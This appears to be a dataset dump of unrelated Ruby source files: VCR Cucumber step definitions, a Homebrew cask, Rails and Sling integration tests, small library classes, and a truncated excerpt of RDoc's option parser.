    @static_timestamp ||= Time.now
  end

  def normalize_http_interaction(hash)
    VCR::HTTPInteraction.from_hash(hash).tap do |i|
      normalize_headers(i.request)
      normalize_headers(i.response)
      i.recorded_at &&= static_timestamp
      i.request.body ||= ''
      i.response.body ||= ''
      i.response.status.message ||= ''

      # Remove non-deterministic headers and headers
      # that get added by a particular HTTP library (but not by others)
      i.response.headers.reject! { |k, v| %w[ server date connection ].include?(k) }
      i.request.headers.reject! { |k, v| %w[ accept user-agent connection expect ].include?(k) }

      # Some HTTP libraries include an extra space ("OK " instead of "OK")
      i.response.status.message = i.response.status.message.strip

      if @scenario_parameters.to_s =~ /excon|faraday/
        # Excon/Faraday do not expose the status message or http version,
        # so we have no way to record these attributes.
        i.response.status.message = nil
        i.response.http_version = nil
      elsif @scenario_parameters.to_s.include?('webmock')
        # WebMock does not expose the HTTP version so we have no way to record it
        i.response.http_version = nil
      end
    end
  end

  def normalize_cassette_content(content)
    return content unless @scenario_parameters.to_s.include?('patron')
    cassette_hash = YAML.load(content)
    cassette_hash['http_interactions'].map! do |hash|
      VCR::HTTPInteraction.from_hash(hash).tap do |i|
        i.request.headers = (i.request.headers || {}).merge!('Expect' => [''])
      end.to_hash
    end
    YAML.dump(cassette_hash)
  end

  def modify_file(file_name, orig_text, new_text)
    in_current_dir do
      file = File.read(file_name)
      regex = /#{Regexp.escape(orig_text)}/
      file.should =~ regex

      file = file.gsub(regex, new_text)
      File.open(file_name, 'w') { |f| f.write(file) }
    end
  end
end
World(VCRHelpers)

Given /the following files do not exist:/ do |files|
  check_file_presence(files.raw.map{|file_row| file_row[0]}, false)
end

Given /^the directory "([^"]*)" does not exist$/ do |dir|
  check_directory_presence([dir], false)
end

Given /^a previously recorded cassette file "([^"]*)" with:$/ do |file_name, content|
  write_file(file_name, normalize_cassette_content(content))
end

Given /^it is (.*)$/ do |date_string|
  set_env('DATE_STRING', date_string)
end

When /^I modify the file "([^"]*)" to replace "([^"]*)" with "([^"]*)"$/ do |file_name, orig_text, new_text|
  modify_file(file_name, orig_text, new_text)
end

When /^I set the "([^"]*)" environment variable to "([^"]*)"$/ do |var, value|
  set_env(var, value)
end

Then /^the file "([^"]*)" should exist$/ do |file_name|
  check_file_presence([file_name], true)
end

Then /^it should (pass|fail) with "([^"]*)"$/ do |pass_fail, partial_output|
  assert_exit_status_and_partial_output(pass_fail == 'pass', partial_output)
end

Then /^the output should contain each of the following:$/ do |table|
  table.raw.flatten.each do |string|
    assert_partial_output(string, all_output)
  end
end

Then /^the file "([^"]*)" should contain YAML like:$/ do |file_name, expected_content|
  actual_content = in_current_dir { File.read(file_name) }
  normalize_cassette_hash(YAML.load(actual_content)).should == normalize_cassette_hash(YAML.load(expected_content))
end

Then /^the file "([^"]*)" should contain JSON like:$/ do |file_name, expected_content|
  actual_content = in_current_dir { File.read(file_name) }
  actual = MultiJson.decode(actual_content)
  expected = MultiJson.decode(expected_content)
  normalize_cassette_hash(actual).should == normalize_cassette_hash(expected)
end

Then /^the file "([^"]*)" should contain ruby like:$/ do |file_name, expected_content|
  actual_content = in_current_dir { File.read(file_name) }
  actual = eval(actual_content)
  expected = eval(expected_content)
  normalize_cassette_hash(actual).should == normalize_cassette_hash(expected)
end

Then /^the file "([^"]*)" should contain each of these:$/ do |file_name, table|
  table.raw.flatten.each do |string|
    check_file_content(file_name, string, true)
  end
end

Then /^the file "([^"]*)" should contain:$/ do |file_name, expected_content|
  check_file_content(file_name, expected_content, true)
end

Then /^the file "([^"]*)" should contain a YAML fragment like:$/ do |file_name, fragment|
  in_current_dir do
    file_content = File.read(file_name)

    # Normalize by removing leading and trailing whitespace...
    file_content = file_content.split("\n").map do |line|
      line.strip
    end.join("\n")

    file_content.should include(fragment)
  end
end

Then /^the cassette "([^"]*)" should have the following response bodies:$/ do |file, table|
  interactions = in_current_dir { YAML.load_file(file) }['http_interactions'].map { |h| VCR::HTTPInteraction.from_hash(h) }
  actual_response_bodies = interactions.map { |i| i.response.body }
  expected_response_bodies = table.raw.flatten
  actual_response_bodies.should =~ expected_response_bodies
end
hexsha: 18f7714f75d150ce2e650bf1047e061cceb30852 | size: 458 | avg_line_length: 32.714286 | max_line_length: 105 | alphanum_fraction: 0.759825
content:

cask :v1 => 'yubikey-neo-manager' do
  version '1.3.0'
  sha256 '9b28bc6350a7afe2e7e3e4397423359487de876ee67aafeca7902f9aaa5f1756'

  url "https://developers.yubico.com/yubikey-neo-manager/Releases/yubikey-neo-manager-#{version}-mac.pkg"
  name 'YubiKey NEO Manager'
  homepage 'https://developers.yubico.com/yubikey-neo-manager/'
  license :bsd

  pkg "yubikey-neo-manager-#{version}-mac.pkg"

  uninstall :pkgutil => 'com.yubico.pkg.YubiKeyNEOManager'
end
hexsha: 21281cd6f2b058ed9c582f0ebc46586ff227a855 | size: 1,632 | avg_line_length: 33.306122 | max_line_length: 78 | alphanum_fraction: 0.64277
content:

require 'test_helper'

class UsersSignupTest < ActionDispatch::IntegrationTest

  def setup
    ActionMailer::Base.deliveries.clear
  end

  test "invalid signup information" do
    get signup_path
    assert_no_difference 'User.count' do
      post users_path, user: { name: "",
                               email: "user@invalid",
                               password: "foo",
                               password_confirmation: "bar" }
    end
    assert_template 'users/new'
    assert_select 'div#error_explanation'
    assert_select 'div.field_with_errors'
  end

  test "valid signup information with account activation" do
    get signup_path
    assert_difference 'User.count', 1 do
      post users_path, user: { name: "Example User",
                               email: "[email protected]",
                               password: "password",
                               password_confirmation: "password" }
    end
    assert_equal 1, ActionMailer::Base.deliveries.size
    user = assigns(:user)
    assert_not user.activated?
    # Try to log in before activation.
    log_in_as(user)
    assert_not is_logged_in?
    # Invalid activation token
    get edit_account_activation_path("invalid token")
    assert_not is_logged_in?
    # Valid token, wrong email
    get edit_account_activation_path(user.activation_token, email: 'wrong')
    assert_not is_logged_in?
    # Valid activation token
    get edit_account_activation_path(user.activation_token, email: user.email)
    assert user.reload.activated?
    follow_redirect!
    assert_template 'users/show'
    assert is_logged_in?
  end
end
hexsha: 91791a254bf86ae85adbc0dd059853410fc39459 | size: 388 | avg_line_length: 29.846154 | max_line_length: 64 | alphanum_fraction: 0.680412
content:

describe Joybox::UI::MenuLabel do

  behaves_like Joybox::UI::MenuLabel

  describe "Initialization" do

    it "should initialize with text & color" do
      color = "#FFFFFF".to_color
      menu_label = MenuLabel.new text: 'MenuLabel', color: color

      menu_label.should.not == nil
      menu_label.text.should == 'MenuLabel'
      menu_label.color.should.not == nil
    end
  end
end
hexsha: 01bc52bdc011b6eaf81e5f4d35371543db31483c | size: 1,132 | avg_line_length: 25.155556 | max_line_length: 79 | alphanum_fraction: 0.673145
content:

require "bundler/setup"
require "pry-byebug"
require "pry-doc"
require "rdoc_rubocop"

RSpec.configure do |config|
  # Enable flags like --only-failures and --next-failure
  config.example_status_persistence_file_path = ".rspec_status"

  # Disable RSpec exposing methods globally on `Module` and `main`
  config.disable_monkey_patching!

  config.expect_with :rspec do |c|
    c.syntax = :expect
  end
end

class String
  # Simplified version of ActiveSupport
  # activesupport/lib/active_support/core_ext/string/strip.rb
  def strip_heredoc
    gsub(/^#{scan(/^ *(?=\S)/).min}/, "")
  end
end

# When stubbing File.open with
#
#   before do
#     expect(File).to receive(:open).with("output.txt", "w")
#   end
#
# and using binding.pry, an unexpected error is raised:
#
#   it do
#     binding.pry
#     expect { subject }.not_to raise_error
#   end
#
#   #=>
#   #<File (class)> received :open with unexpected arguments
#     expected: ("output.txt", "w")
#          got: ("/home/user/.pry_history", "a", 123)
#
# To make it easy to stub and debug, a separate File class is used in RuboCop instead of ::File.
class RuboCop::Formatter::File < File; end
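For reference, the String#strip_heredoc patch above removes the smallest common leading indentation from every line, which is handy for heredocs in specs. A quick illustration derived from the method body:

snippet = <<-RUBY.strip_heredoc
      def hello
        puts "hi"
      end
RUBY

puts snippet
# => def hello
#      puts "hi"
#    end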
hexsha: 03fb9a70a57d81949573c4931dcb2b21c1a1fabe | size: 6,049 | avg_line_length: 42.300699 | max_line_length: 102 | alphanum_fraction: 0.66044
content:

#!/usr/bin/env ruby

# Add all files in testscripts\SlingRuby\lib directory to ruby "require" search path
require './ruby-lib-dir.rb'

require 'sling/test'
require 'sling/search'
require 'sling/contacts'
require 'test/unit.rb'
include SlingSearch
include SlingUsers
include SlingContacts

class TC_Kern939Test < Test::Unit::TestCase
  include SlingTest

  # This test depends on knowledge about the default user pages.
  def test_default_user_pages
    m = Time.now.to_f.to_s.gsub('.', '')
    @s.switch_user(User.admin_user())
    user = create_user("testuser-#{m}")
    @s.switch_user(user)
    path = "#{user.home_path_for(@s)}/pages"
    res = @s.execute_get(@s.url_for("#{path}.2.json"))
    assert_equal("200", res.code, "Should have created pages in postprocessing")
    json = JSON.parse(res.body)
    assert_not_nil(json["index.html"], "Expected default page not found")
  end

  # This test depends on knowledge about the default group pages.
  def test_default_group_pages
    m = Time.now.to_f.to_s.gsub('.', '')
    @s.switch_user(User.admin_user())
    group = create_group("g-testgroup-#{m}")
    path = "#{group.home_path_for(@s)}/pages"
    res = @s.execute_get(@s.url_for("#{path}.2.json"))
    assert_equal("200", res.code, "Should have created pages in postprocessing")
    json = JSON.parse(res.body)
    assert_not_nil(json["index.html"], "Expected default page not found")
  end

  def test_override_default_template
    m = Time.now.to_f.to_s.gsub('.', '')
    @s.switch_user(User.admin_user())
    templatepath = "/test/template-#{m}"
    res = @s.execute_post(@s.url_for(templatepath), {
      ":operation" => "import",
      ":contentType" => "json",
      ":content" => "{nondefaultpage: {pageproperty: pagevalue}, nondefaultproperty: nondefaultvalue}"
    })
    # Check some assumptions before proceeding to the real test.
    assert_equal("201", res.code, "Did not successfully create test template")
    res = @s.execute_get(@s.url_for("#{templatepath}.2.json"))
    assert_equal("200", res.code, "New page content is missing")
    props = JSON.parse(res.body)
    assert_equal("nondefaultvalue", props["nondefaultproperty"], "Top-level property is missing")
    assert_equal("pagevalue", props["nondefaultpage"]["pageproperty"], "Sub-page is missing")

    # And now for the real test...
    userid = "testuser-#{m}"
    password = "testuser"
    res = @s.execute_post(@s.url_for("#{$USER_URI}"), {
      ":name" => userid,
      "pwd" => password,
      "pwdConfirm" => password,
      ":sakai:pages-template" => templatepath,
      "_charset_" => "UTF-8"
    })
    assert_equal("200", res.code, "Should have created user as admin")
    user = User.new(userid)
    @s.switch_user(user)
    res = @s.execute_get(@s.url_for("#{user.home_path_for(@s)}/pages.2.json"))
    assert_equal("200", res.code, "New page content is missing")
    props = JSON.parse(res.body)
    assert_equal("nondefaultvalue", props["nondefaultproperty"], "Top-level property is missing")
    assert_equal("pagevalue", props["nondefaultpage"]["pageproperty"], "Sub-page is missing")
  end

  def test_default_user_access
    m = Time.now.to_f.to_s.gsub('.', '')
    @s.switch_user(User.admin_user())
    user = create_user("testuser-#{m}")
    @s.switch_user(user)
    path = "#{user.home_path_for(@s)}/pages"
    res = @s.execute_get(@s.url_for("#{path}.json"))
    assert_equal("200", res.code, "The user should be able to reach the user's pages")
    res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval")
    assert_equal("201", res.code, "Users should be able to add to their own pages")
    res = @s.execute_get(@s.url_for("#{path}/newnode.json"))
    assert_equal("200", res.code, "New page content is missing")
    props = JSON.parse(res.body)
    assert_equal("newval", props["newprop"], "New page content is incorrect")
    @s.switch_user(SlingUsers::User.anonymous)
    res = @s.execute_get(@s.url_for("#{path}.json"))
    assert_equal("200", res.code, "By default, the user's pages are public")
  end

  def test_default_group_access
    m = Time.now.to_f.to_s.gsub('.', '')
    @s.switch_user(User.admin_user())
    manager = create_user("manager-#{m}")
    member = create_user("member-#{m}")
    otheruser = create_user("otheruser-#{m}")
    group = Group.new("g-test-#{m}")
    res = @s.execute_post(@s.url_for("#{$GROUP_URI}"), {
      ":name" => group.name,
      ":sakai:manager" => manager.name,
      ":member" => member.name,
      "_charset_" => "UTF-8"
    })
    path = "#{group.home_path_for(@s)}/pages"
    @s.switch_user(member)
    res = @s.execute_get(@s.url_for("#{path}.json"))
    assert_equal("200", res.code, "Members should be able to read the group's pages")
    res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval")
    assert_not_equal("201", res.code, "Members should not be able to add to the group's pages")
    res = @s.execute_get(@s.url_for("#{path}/newnode.json"))
    assert_not_equal("200", res.code, "New page content should not have been created")
    @s.switch_user(manager)
    res = @s.execute_get(@s.url_for("#{path}.json"))
    assert_equal("200", res.code, "Managers should be able to read the group's pages")
    res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval")
    assert_equal("201", res.code, "Managers should be able to add to the group's pages")
    res = @s.execute_get(@s.url_for("#{path}/newnode.json"))
    assert_equal("200", res.code, "New page content is missing")
    props = JSON.parse(res.body)
    assert_equal("newval", props["newprop"], "New page content is incorrect")
    @s.switch_user(SlingUsers::User.anonymous)
    res = @s.execute_get(@s.url_for("#{path}.json"))
    assert_equal("200", res.code, "By default, the group's pages are public")
    @s.switch_user(otheruser)
    res = @s.execute_post(@s.url_for("#{path}/newernode"), "newprop" => "newval")
    assert_not_equal("201", res.code, "Non-members should not be able to add to the group's pages")
  end

end
hexsha: 38bb242ba046b32af4ccfaf5accfdb44c217b3a1 | size: 1,316 | avg_line_length: 30.604651 | max_line_length: 80 | alphanum_fraction: 0.658055
content:

# frozen_string_literal: true

require 'stannum/constraints/base'

module Stannum::Constraints
  # An absence constraint asserts that the object is nil or empty.
  #
  # @example Using an Absence constraint
  #   constraint = Stannum::Constraints::Absence.new
  #
  #   constraint.matches?(nil)        #=> true
  #   constraint.matches?(Object.new) #=> false
  #
  # @example Using an Absence constraint with an Array
  #   constraint.matches?([])        #=> true
  #   constraint.matches?([1, 2, 3]) #=> false
  #
  # @example Using an Absence constraint with a Hash
  #   constraint.matches?({})               #=> true
  #   constraint.matches?({ key: 'value' }) #=> false
  class Absence < Stannum::Constraints::Base
    # The :type of the error generated for a matching object.
    NEGATED_TYPE = Stannum::Constraints::Presence::TYPE

    # The :type of the error generated for a non-matching object.
    TYPE = Stannum::Constraints::Presence::NEGATED_TYPE

    # Checks that the object is nil or empty.
    #
    # @return [true, false] true if the object is nil or empty, otherwise false.
    #
    # @see Stannum::Constraint#matches?
    def matches?(actual)
      return true if actual.nil?
      return true if actual.respond_to?(:empty?) && actual.empty?

      false
    end
    alias match? matches?
  end
end
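Because #matches? relies on #empty?, the constraint also treats empty strings as absent; a small illustration derived directly from the method body above:

constraint = Stannum::Constraints::Absence.new

constraint.matches?(nil)   # => true   (nil is absent)
constraint.matches?('')    # => true   (String#empty? is true)
constraint.matches?('  ')  # => false  (whitespace-only strings are not empty)
constraint.matches?(0)     # => false  (Integer does not respond to #empty?)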
hexsha: 7acc839479fcf5a72f5bea3cc8c4b91716e01345 | size: 1,519 | avg_line_length: 34.522727 | max_line_length: 117 | alphanum_fraction: 0.702436
content:

module Shopr
  class TaxRate < ApplicationRecord
    include Shopr::AssociatedCountries

    # The order address types which may be used when choosing how to apply the tax rate
    ADDRESS_TYPES = %w[billing delivery].freeze

    # Validations
    validates :name, presence: true
    validates :address_type, inclusion: { in: ADDRESS_TYPES }
    validates :rate, numericality: true

    # All products which are assigned to this tax rate
    has_many :products, dependent: :restrict_with_exception, class_name: 'Shopr::Product'

    # All delivery service prices which are assigned to this tax rate
    has_many :delivery_service_prices, dependent: :restrict_with_exception, class_name: 'Shopr::DeliveryServicePrice'

    # All tax rates ordered by their ID
    scope :ordered, -> { order(:id) }

    # Set the address type if appropriate
    before_validation { self.address_type = ADDRESS_TYPES.first if address_type.blank? }

    # A description of the tax rate including its name & percentage
    #
    # @return [String]
    def description
      "#{name} (#{rate}%)"
    end

    # The rate for a given order based on the rules on the tax rate
    #
    # @return [BigDecimal]
    def rate_for(order)
      return rate if countries.empty?
      return rate if address_type == 'billing' && (order.billing_country.nil? || country?(order.billing_country))
      return rate if address_type == 'delivery' && (order.delivery_country.nil? || country?(order.delivery_country))

      BigDecimal(0)
    end
  end
end
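To make the #rate_for rules concrete, here is an illustrative sketch; the attribute values are hypothetical, and country? comes from the AssociatedCountries concern included above:

# Hypothetical attributes, for illustration only (TaxRate is an ActiveRecord model).
vat = Shopr::TaxRate.new(name: 'VAT', rate: 20.0, address_type: 'delivery')

vat.description  # => "VAT (20.0%)"

# rate_for(order) then applies the rules shown in the method body:
#   * no associated countries     -> the rate always applies
#   * address_type == 'delivery'  -> the rate applies when the order's delivery
#                                    country is unknown or is an associated country
#   * otherwise                   -> BigDecimal(0), i.e. no tax is charged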
hexsha: 792b473b7939e58a3ce3e35f446cc579fa6e9a3c | size: 34,089
content (truncated):
# frozen_string_literal: true require 'optparse' require 'pathname' ## # RDoc::Options handles the parsing and storage of options # # == Saved Options # # You can save some options like the markup format in the # <tt>.rdoc_options</tt> file in your gem. The easiest way to do this is: # # rdoc --markup tomdoc --write-options # # Which will automatically create the file and fill it with the options you # specified. # # The following options will not be saved since they interfere with the user's # preferences or with the normal operation of RDoc: # # * +--coverage-report+ # * +--dry-run+ # * +--encoding+ # * +--force-update+ # * +--format+ # * +--pipe+ # * +--quiet+ # * +--template+ # * +--verbose+ # # == Custom Options # # Generators can hook into RDoc::Options to add generator-specific command # line options. # # When <tt>--format</tt> is encountered in ARGV, RDoc calls ::setup_options on # the generator class to add extra options to the option parser. Options for # custom generators must occur after <tt>--format</tt>. <tt>rdoc --help</tt> # will list options for all installed generators. # # Example: # # class RDoc::Generator::Spellcheck # RDoc::RDoc.add_generator self # # def self.setup_options rdoc_options # op = rdoc_options.option_parser # # op.on('--spell-dictionary DICTIONARY', # RDoc::Options::Path) do |dictionary| # rdoc_options.spell_dictionary = dictionary # end # end # end # # Of course, RDoc::Options does not respond to +spell_dictionary+ by default # so you will need to add it: # # class RDoc::Options # # ## # # The spell dictionary used by the spell-checking plugin. # # attr_accessor :spell_dictionary # # end # # == Option Validators # # OptionParser validators will validate and cast user input values. In # addition to the validators that ship with OptionParser (String, Integer, # Float, TrueClass, FalseClass, Array, Regexp, Date, Time, URI, etc.), # RDoc::Options adds Path, PathArray and Template. class RDoc::Options ## # The deprecated options. DEPRECATED = { '--accessor' => 'support discontinued', '--diagram' => 'support discontinued', '--help-output' => 'support discontinued', '--image-format' => 'was an option for --diagram', '--inline-source' => 'source code is now always inlined', '--merge' => 'ri now always merges class information', '--one-file' => 'support discontinued', '--op-name' => 'support discontinued', '--opname' => 'support discontinued', '--promiscuous' => 'files always only document their content', '--ri-system' => 'Ruby installers use other techniques', } ## # RDoc options ignored (or handled specially) by --write-options SPECIAL = %w[ coverage_report dry_run encoding files force_output force_update generator generator_name generator_options generators op_dir option_parser pipe rdoc_include root static_path stylesheet_url template template_dir update_output_dir verbosity write_options ] ## # Option validator for OptionParser that matches a directory that exists on # the filesystem. Directory = Object.new ## # Option validator for OptionParser that matches a file or directory that # exists on the filesystem. Path = Object.new ## # Option validator for OptionParser that matches a comma-separated list of # files or directories that exist on the filesystem. PathArray = Object.new ## # Option validator for OptionParser that matches a template directory for an # installed generator that lives in # <tt>"rdoc/generator/template/#{template_name}"</tt> Template = Object.new ## # Character-set for HTML output. 
#encoding is preferred over #charset attr_accessor :charset ## # If true, RDoc will not write any files. attr_accessor :dry_run ## # The output encoding. All input files will be transcoded to this encoding. # # The default encoding is UTF-8. This is set via --encoding. attr_accessor :encoding ## # Files matching this pattern will be excluded attr_writer :exclude ## # The list of files to be processed attr_accessor :files ## # Create the output even if the output directory does not look # like an rdoc output directory attr_accessor :force_output ## # Scan newer sources than the flag file if true. attr_accessor :force_update ## # Formatter to mark up text with attr_accessor :formatter ## # Description of the output generator (set with the <tt>--format</tt> option) attr_accessor :generator ## # For #== attr_reader :generator_name # :nodoc: ## # Loaded generator options. Used to prevent --help from loading the same # options multiple times. attr_accessor :generator_options ## # Old rdoc behavior: hyperlink all words that match a method name, # even if not preceded by '#' or '::' attr_accessor :hyperlink_all ## # Include line numbers in the source code attr_accessor :line_numbers ## # The output locale. attr_accessor :locale ## # The directory where locale data live. attr_accessor :locale_dir ## # Name of the file, class or module to display in the initial index page (if # not specified the first file we encounter is used) attr_accessor :main_page ## # The default markup format. The default is 'rdoc'. 'markdown', 'tomdoc' # and 'rd' are also built-in. attr_accessor :markup ## # If true, only report on undocumented files attr_accessor :coverage_report ## # The name of the output directory attr_accessor :op_dir ## # The OptionParser for this instance attr_accessor :option_parser ## # Output heading decorations? attr_accessor :output_decoration ## # Directory where guides, FAQ, and other pages not associated with a class # live. You may leave this unset if these are at the root of your project. attr_accessor :page_dir ## # Is RDoc in pipe mode? attr_accessor :pipe ## # Array of directories to search for files to satisfy an :include: attr_accessor :rdoc_include ## # Root of the source documentation will be generated for. Set this when # building documentation outside the source directory. Defaults to the # current directory. attr_accessor :root ## # Include the '#' at the front of hyperlinked instance method names attr_accessor :show_hash ## # Directory to copy static files from attr_accessor :static_path ## # The number of columns in a tab attr_accessor :tab_width ## # Template to be used when generating output attr_accessor :template ## # Directory the template lives in attr_accessor :template_dir ## # Additional template stylesheets attr_accessor :template_stylesheets ## # Documentation title attr_accessor :title ## # Should RDoc update the timestamps in the output dir? attr_accessor :update_output_dir ## # Verbosity, zero means quiet attr_accessor :verbosity ## # URL of web cvs frontend attr_accessor :webcvs ## # Minimum visibility of a documented method. One of +:public+, +:protected+, # +:private+ or +:nodoc+. # # The +:nodoc+ visibility ignores all directives related to visibility. The # other visibilities may be overridden on a per-method basis with the :doc: # directive. 
attr_reader :visibility def initialize loaded_options = nil # :nodoc: init_ivars override loaded_options if loaded_options end def init_ivars # :nodoc: @dry_run = false @exclude = %w[ ~\z \.orig\z \.rej\z \.bak\z \.gemspec\z ] @files = nil @force_output = false @force_update = true @generator = nil @generator_name = nil @generator_options = [] @generators = RDoc::RDoc::GENERATORS @hyperlink_all = false @line_numbers = false @locale = nil @locale_name = nil @locale_dir = 'locale' @main_page = nil @markup = 'rdoc' @coverage_report = false @op_dir = nil @page_dir = nil @pipe = false @output_decoration = true @rdoc_include = [] @root = Pathname(Dir.pwd) @show_hash = false @static_path = [] @stylesheet_url = nil # TODO remove in RDoc 4 @tab_width = 8 @template = nil @template_dir = nil @template_stylesheets = [] @title = nil @update_output_dir = true @verbosity = 1 @visibility = :protected @webcvs = nil @write_options = false @encoding = Encoding::UTF_8 @charset = @encoding.name end def init_with map # :nodoc: init_ivars encoding = map['encoding'] @encoding = encoding ? Encoding.find(encoding) : encoding @charset = map['charset'] @exclude = map['exclude'] @generator_name = map['generator_name'] @hyperlink_all = map['hyperlink_all'] @line_numbers = map['line_numbers'] @locale_name = map['locale_name'] @locale_dir = map['locale_dir'] @main_page = map['main_page'] @markup = map['markup'] @op_dir = map['op_dir'] @show_hash = map['show_hash'] @tab_width = map['tab_width'] @template_dir = map['template_dir'] @title = map['title'] @visibility = map['visibility'] @webcvs = map['webcvs'] @rdoc_include = sanitize_path map['rdoc_include'] @static_path = sanitize_path map['static_path'] end def yaml_initialize tag, map # :nodoc: init_with map end def override map # :nodoc: if map.has_key?('encoding') encoding = map['encoding'] @encoding = encoding ? 
Encoding.find(encoding) : encoding end @charset = map['charset'] if map.has_key?('charset') @exclude = map['exclude'] if map.has_key?('exclude') @generator_name = map['generator_name'] if map.has_key?('generator_name') @hyperlink_all = map['hyperlink_all'] if map.has_key?('hyperlink_all') @line_numbers = map['line_numbers'] if map.has_key?('line_numbers') @locale_name = map['locale_name'] if map.has_key?('locale_name') @locale_dir = map['locale_dir'] if map.has_key?('locale_dir') @main_page = map['main_page'] if map.has_key?('main_page') @markup = map['markup'] if map.has_key?('markup') @op_dir = map['op_dir'] if map.has_key?('op_dir') @show_hash = map['show_hash'] if map.has_key?('show_hash') @tab_width = map['tab_width'] if map.has_key?('tab_width') @template_dir = map['template_dir'] if map.has_key?('template_dir') @title = map['title'] if map.has_key?('title') @visibility = map['visibility'] if map.has_key?('visibility') @webcvs = map['webcvs'] if map.has_key?('webcvs') if map.has_key?('rdoc_include') @rdoc_include = sanitize_path map['rdoc_include'] end if map.has_key?('static_path') @static_path = sanitize_path map['static_path'] end end def == other # :nodoc: self.class === other and @encoding == other.encoding and @generator_name == other.generator_name and @hyperlink_all == other.hyperlink_all and @line_numbers == other.line_numbers and @locale == other.locale and @locale_dir == other.locale_dir and @main_page == other.main_page and @markup == other.markup and @op_dir == other.op_dir and @rdoc_include == other.rdoc_include and @show_hash == other.show_hash and @static_path == other.static_path and @tab_width == other.tab_width and @template == other.template and @title == other.title and @visibility == other.visibility and @webcvs == other.webcvs end ## # Check that the files on the command line exist def check_files @files.delete_if do |file| if File.exist? file then if File.readable? file then false else warn "file '#{file}' not readable" true end else warn "file '#{file}' not found" true end end end ## # Ensure only one generator is loaded def check_generator if @generator then raise OptionParser::InvalidOption, "generator already set to #{@generator_name}" end end ## # Set the title, but only if not already set. Used to set the title # from a source file, so that a title set from the command line # will have the priority. def default_title=(string) @title ||= string end ## # For dumping YAML def encode_with coder # :nodoc: encoding = @encoding ? @encoding.name : nil coder.add 'encoding', encoding coder.add 'static_path', sanitize_path(@static_path) coder.add 'rdoc_include', sanitize_path(@rdoc_include) ivars = instance_variables.map { |ivar| ivar.to_s[1..-1] } ivars -= SPECIAL ivars.sort.each do |ivar| coder.add ivar, instance_variable_get("@#{ivar}") end end ## # Create a regexp for #exclude def exclude if @exclude.nil? or Regexp === @exclude then # done, #finish is being re-run @exclude elsif @exclude.empty? then nil else Regexp.new(@exclude.join("|")) end end ## # Completes any unfinished option setup business such as filtering for # existent files, creating a regexp for #exclude and setting a default # #template. def finish @op_dir ||= 'doc' @rdoc_include << "." if @rdoc_include.empty? 
root = @root.to_s @rdoc_include << root unless @rdoc_include.include?(root) @exclude = self.exclude finish_page_dir check_files # If no template was specified, use the default template for the output # formatter unless @template then @template = @generator_name @template_dir = template_dir_for @template end if @locale_name @locale = RDoc::I18n::Locale[@locale_name] @locale.load(@locale_dir) else @locale = nil end self end ## # Fixes the page_dir to be relative to the root_dir and adds the page_dir to # the files list. def finish_page_dir return unless @page_dir @files << @page_dir.to_s page_dir = nil begin page_dir = @page_dir.expand_path.relative_path_from @root rescue ArgumentError # On Windows, sometimes crosses different drive letters. page_dir = @page_dir.expand_path end @page_dir = page_dir end ## # Returns a properly-space list of generators and their descriptions. def generator_descriptions lengths = [] generators = RDoc::RDoc::GENERATORS.map do |name, generator| lengths << name.length description = generator::DESCRIPTION if generator.const_defined? :DESCRIPTION [name, description] end longest = lengths.max generators.sort.map do |name, description| if description then " %-*s - %s" % [longest, name, description] else " #{name}" end end.join "\n" end ## # Parses command line options. def parse argv ignore_invalid = true argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT'] opts = OptionParser.new do |opt| @option_parser = opt opt.program_name = File.basename $0 opt.version = RDoc::VERSION opt.release = nil opt.summary_indent = ' ' * 4 opt.banner = <<-EOF Usage: #{opt.program_name} [options] [names...] Files are parsed, and the information they contain collected, before any output is produced. This allows cross references between all files to be resolved. If a name is a directory, it is traversed. If no names are specified, all Ruby files in the current directory (and subdirectories) are processed. How RDoc generates output depends on the output formatter being used, and on the options you give. Options can be specified via the RDOCOPT environment variable, which functions similar to the RUBYOPT environment variable for ruby. $ export RDOCOPT="--show-hash" will make rdoc show hashes in method links by default. Command-line options always will override those in RDOCOPT. Available formatters: #{generator_descriptions} RDoc understands the following file formats: EOF parsers = Hash.new { |h,parser| h[parser] = [] } RDoc::Parser.parsers.each do |regexp, parser| parsers[parser.name.sub('RDoc::Parser::', '')] << regexp.source end parsers.sort.each do |parser, regexp| opt.banner += " - #{parser}: #{regexp.join ', '}\n" end opt.banner += " - TomDoc: Only in ruby files\n" opt.banner += "\n The following options are deprecated:\n\n" name_length = DEPRECATED.keys.sort_by { |k| k.length }.last.length DEPRECATED.sort_by { |k,| k }.each do |name, reason| opt.banner += " %*1$2$s %3$s\n" % [-name_length, name, reason] end opt.accept Template do |template| template_dir = template_dir_for template unless template_dir then $stderr.puts "could not find template #{template}" nil else [template, template_dir] end end opt.accept Directory do |directory| directory = File.expand_path directory raise OptionParser::InvalidArgument unless File.directory? directory directory end opt.accept Path do |path| path = File.expand_path path raise OptionParser::InvalidArgument unless File.exist? path path end opt.accept PathArray do |paths,| paths = if paths then paths.split(',').map { |d| d unless d.empty? 
} end paths.map do |path| path = File.expand_path path raise OptionParser::InvalidArgument unless File.exist? path path end end opt.separator nil opt.separator "Parsing options:" opt.separator nil opt.on("--encoding=ENCODING", "-e", Encoding.list.map { |e| e.name }, "Specifies the output encoding. All files", "read will be converted to this encoding.", "The default encoding is UTF-8.", "--encoding is preferred over --charset") do |value| @encoding = Encoding.find value @charset = @encoding.name # may not be valid value end opt.separator nil opt.on("--locale=NAME", "Specifies the output locale.") do |value| @locale_name = value end opt.on("--locale-data-dir=DIR", "Specifies the directory where locale data live.") do |value| @locale_dir = value end opt.separator nil opt.on("--all", "-a", "Synonym for --visibility=private.") do |value| @visibility = :private end opt.separator nil opt.on("--exclude=PATTERN", "-x", Regexp, "Do not process files or directories", "matching PATTERN.") do |value| @exclude << value end opt.separator nil opt.on("--extension=NEW=OLD", "-E", "Treat files ending with .new as if they", "ended with .old. Using '-E cgi=rb' will", "cause xxx.cgi to be parsed as a Ruby file.") do |value| new, old = value.split(/=/, 2) unless new and old then raise OptionParser::InvalidArgument, "Invalid parameter to '-E'" end unless RDoc::Parser.alias_extension old, new then raise OptionParser::InvalidArgument, "Unknown extension .#{old} to -E" end end opt.separator nil opt.on("--[no-]force-update", "-U", "Forces rdoc to scan all sources even if", "no files are newer than the flag file.") do |value| @force_update = value end opt.separator nil opt.on("--pipe", "-p", "Convert RDoc on stdin to HTML") do @pipe = true end opt.separator nil opt.on("--tab-width=WIDTH", "-w", Integer, "Set the width of tab characters.") do |value| raise OptionParser::InvalidArgument, 